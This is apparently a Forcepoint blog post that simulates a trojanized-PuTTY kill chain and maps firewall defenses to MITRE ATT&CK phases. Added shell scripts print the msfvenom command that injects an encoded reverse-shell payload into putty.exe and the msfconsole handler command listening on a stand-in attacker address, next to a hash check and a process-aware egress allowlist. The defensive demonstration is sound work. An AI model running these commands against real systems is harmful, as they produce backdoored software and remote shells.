X-Labs
July 28, 2021

Forcepoint NGFW MITRE ATT&CK simulation

Jenny Heino, Principal Security Researcher

To illustrate the advanced intrusion detection capabilities of Forcepoint NGFW, I simulated a kill-chain attack and walked it through the layers of defense that fire at each stage.

Intrusion Prevention with Forcepoint NGFW

In this scenario, an admin researching an issue finds a potential solution on a forum. The post provides a download link for PuTTY, but the link points to a server controlled by the attacker, which serves a backdoored copy of PuTTY.

The reverse TCP backdoor was injected into the PuTTY executable with msfvenom from the Metasploit framework and encoded with shikata_ga_nai, a polymorphic XOR encoder chosen because its output is typically harder to match with static signatures (the decoder stub it prepends is itself well known, so encoding alone does not guarantee evasion). The attacker runs a listener on their machine, waiting for the executable to open a reverse TCP connection back home.
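As an added example (not part of the original post, and not Forcepoint's or the author's code), here is how a backdoored PuTTY of the kind described above is produced with msfvenom, how the attacker's handler is started, and the SHA-256 check that shows why the swapped binary is detectable by hash. The listener address 192.0.2.10, port 4444, the file names, the windows/shell_reverse_tcp payload, a 32-bit putty.exe as the template and five encoder iterations are all assumptions; the post only says a reverse TCP payload encoded with shikata_ga_nai was used.

```shell
#!/usr/bin/env bash
# Added example, not the original post's code. Shows the msfvenom/msfconsole
# commands for the scenario and a SHA-256 check a defender can run.
# Assumptions: attacker at 192.0.2.10:4444, a 32-bit putty.exe as template,
# payload windows/shell_reverse_tcp, five shikata_ga_nai iterations.

ATTACKER_IP="${ATTACKER_IP:-192.0.2.10}"
ATTACKER_PORT="${ATTACKER_PORT:-4444}"
PAYLOAD="windows/shell_reverse_tcp"

# Command that injects the payload into a clean PuTTY (-x template, -k keeps
# the original program running in its own thread) and passes the shellcode
# through shikata_ga_nai five times (-e encoder, -i iterations).
build_msfvenom_cmd() {
    local template="$1" output="$2"
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -x %s -k -e x86/shikata_ga_nai -i 5 -f exe -o %s' \
        "$PAYLOAD" "$ATTACKER_IP" "$ATTACKER_PORT" "$template" "$output"
}

# Command that starts the attacker's handler waiting for the callback.
build_handler_cmd() {
    printf 'msfconsole -q -x "use exploit/multi/handler; set payload %s; set LHOST %s; set LPORT %s; run"' \
        "$PAYLOAD" "$ATTACKER_IP" "$ATTACKER_PORT"
}

# Portable SHA-256 of a file (coreutils sha256sum or BSD shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Defender-side check: compare a downloaded file with the hash the vendor
# publishes for that release. Returns 0 on match, 1 on mismatch.
verify_sha256() {
    local actual
    actual="$(sha256_of "$1")"
    [ "$actual" = "$2" ]
}

main() {
    echo "# Attacker builds the trojanized binary:"
    build_msfvenom_cmd putty.exe putty_backdoored.exe; echo
    echo "# Attacker waits for the callback:"
    build_handler_cmd; echo
    # Demonstrate the hash check on two constructed files standing in for the
    # clean and the backdoored download (no real PuTTY binary is needed).
    local tmp published
    tmp="$(mktemp -d)"
    printf 'clean putty' > "$tmp/putty.exe"
    printf 'clean putty + payload' > "$tmp/putty_backdoored.exe"
    published="$(sha256_of "$tmp/putty.exe")"
    verify_sha256 "$tmp/putty.exe" "$published" && echo "clean copy: hash matches vendor"
    verify_sha256 "$tmp/putty_backdoored.exe" "$published" || echo "backdoored copy: hash mismatch, do not run"
    rm -rf "$tmp"
}

main
```

Because the payload is injected into the template, the trojanized file cannot match the hash the vendor publishes and its Authenticode signature no longer verifies; a file-reputation or hash-allowlist check catches it even when the encoded shellcode itself slips past a signature engine.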

I used the MITRE ATT&CK framework to divide the simulation into phases. The following defense mechanisms are shown in each phase:

1. Initial Access

  • URL Filtering
  • Deep Packet Inspection
  • File Filtering (Sandbox)

2. Execution

  • ECA Whitelisting
  • Snort Integration

3. Exfiltration

  • DLP Integration
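The Execution-phase defenses above depend on the firewall knowing which process on the endpoint opened a connection, which is what the Endpoint Context Agent reports. As an added example, not Forcepoint's NGFW or ECA code, here is a simplified model of that check in shell over constructed connection records: each record carries the process name the endpoint agent reported, and an allowlist states which executables may connect outbound and on which ports. The record format, the allowlist and all addresses are assumptions; the second record is the backdoored putty.exe calling home.

```shell
#!/usr/bin/env bash
# Added example, not Forcepoint's NGFW or ECA code: a simplified process-aware
# egress check. Records are constructed: timestamp,src,dst,dport,process,user.

# Constructed connection records as an endpoint agent might report them.
# The second line is the backdoored putty.exe calling home on port 4444.
RECORDS='2021-07-28T10:15:03Z,10.0.0.25,198.51.100.7,443,chrome.exe,admin
2021-07-28T10:16:41Z,10.0.0.25,192.0.2.10,4444,putty.exe,admin
2021-07-28T10:16:45Z,10.0.0.25,10.0.0.5,22,putty.exe,admin
2021-07-28T10:17:02Z,10.0.0.25,203.0.113.9,443,updater.exe,admin'

# Assumed allowlist: executable name and the destination ports it may use.
ALLOWLIST='chrome.exe:80,443
putty.exe:22
outlook.exe:443,993'

# Prints one line per record that violates the allowlist, with the reason.
# Exit status 1 when anything was flagged, 0 otherwise.
flag_egress() {
    printf '%s\n' "$1" | awk -F, -v allow="$2" '
    BEGIN {
        n = split(allow, rules, "\n")
        for (i = 1; i <= n; i++) {
            split(rules[i], kv, ":")
            m = split(kv[2], ports, ",")
            for (j = 1; j <= m; j++) ok[kv[1] "/" ports[j]] = 1
            known[kv[1]] = 1
        }
    }
    {
        proc = $5; port = $4
        if (!(proc in known)) {
            print $1, $2 " -> " $3 ":" port, proc, "executable not on allowlist"; hits++
        } else if (!((proc "/" port) in ok)) {
            print $1, $2 " -> " $3 ":" port, proc, "port not allowed for this executable"; hits++
        }
    }
    END { exit hits > 0 ? 1 : 0 }'
}

# Number of flagged records, for callers that only want a count.
count_flagged() {
    flag_egress "$1" "$2" | wc -l | tr -d ' '
}

echo "flagged records: $(count_flagged "$RECORDS" "$ALLOWLIST")"
flag_egress "$RECORDS" "$ALLOWLIST" || true
```

The legitimate putty.exe session to 10.0.0.5:22 passes, while the same executable connecting to 192.0.2.10:4444 is flagged: a plain port-based rule would have to block 4444 for everyone, whereas a process-aware rule blocks it only where it makes no sense, which is the whole value of the endpoint context.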

 

Here is my kill-chain video demo:


Of note: to keep the demo seamless, I silenced several defense mechanisms during deep packet inspection. A partial list of the items not shown in the video:

  • IP address lists
  • Packet validation (IP and TCP)
  • Correlation situations
  • File reputation
  • Anti-malware
  • User-based restrictions
  • TLS decryption
  • Sidewinder proxy


Jenny Heino is a Principal Security Researcher at Forcepoint, specializing in network security and based in Finland. Although she completed her master's studies in the field of Mathematical Logic, she quickly found her passion in vulnerability research and joined the research team for the...


About Forcepoint

Forcepoint is one of the world's leading providers of cybersecurity for user and data security, and has made it its mission to protect organizations while driving digital transformation and growth. Our solutions adapt to user behavior in real time and give employees secure access to data at full productivity.